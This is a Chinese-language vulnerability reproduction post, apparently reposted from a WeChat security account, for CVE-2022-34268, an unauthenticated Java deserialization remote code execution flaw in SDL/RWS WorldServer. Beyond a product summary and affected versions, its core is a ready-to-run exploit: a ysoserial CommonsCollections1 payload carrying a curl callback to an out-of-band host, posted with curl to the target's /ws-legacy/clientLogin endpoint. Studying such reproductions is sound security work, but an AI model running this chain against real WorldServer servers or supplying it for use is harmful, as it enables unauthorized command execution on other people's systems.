本人非原创漏洞作者,文章仅作为知识分享用
一切直接或间接由于本文所造成的后果与本人无关
如有侵权,联系删除
产品简介
SDL WorldServer 翻译流程管理系统专为本地化项目经理及其团队而设计,用于集中管理、自动化和控制大量的翻译项目,以提供按时、按预算的高质量翻译交付。企业团队可在整个组织内重新获得翻译控制权,并可与多个外部翻译供应商(LSP)高效协作。目前支持许多全球知名品牌的翻译流程,成功简化并加快了其内容从网站到文档到软件的本地化流程。
开发语言:Java
官网地址:https:
//www.rws.com/cn/
空间测绘
回复“CVE-2022-34268”获取空间测绘语句
漏洞描述
在 11.7.3 之前的 RWS WorldServer 中发现了一个问题。/clientLogin 在没有身份验证的情况下反序列化 Java 对象,从而导致在主机上执行命令。
影响版本
SDL
WorldServer
≤ 11
.7
.2
.243
漏洞利用
1.使用ysoserial生成序列化数据
java
-jar
ysoserial-all
.jar
CommonsCollections1
"
curl
97
c2a13451
.ipv6
.1433
.eu
.org
" >
poc
.bin
2.向目标发送序列化数据
curl
--data-binary
@poc
.bin http://xxx.xxx.xxx/ws-legacy/clientLogin -H
"Content-Type: application/x-java-serialized-object"
参考链接
https:
/
/nvd.nist.gov/vuln
/detail/
CVE-
2022
-
34268
https:
/
/www.triskelelabs.com/vulnerabilities
-
in
-rws-worldserver
原文始发于微信公众号(不够安全):[漏洞复现] CVE-2022-34268 SDL WroldServer 反序列化RCE
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论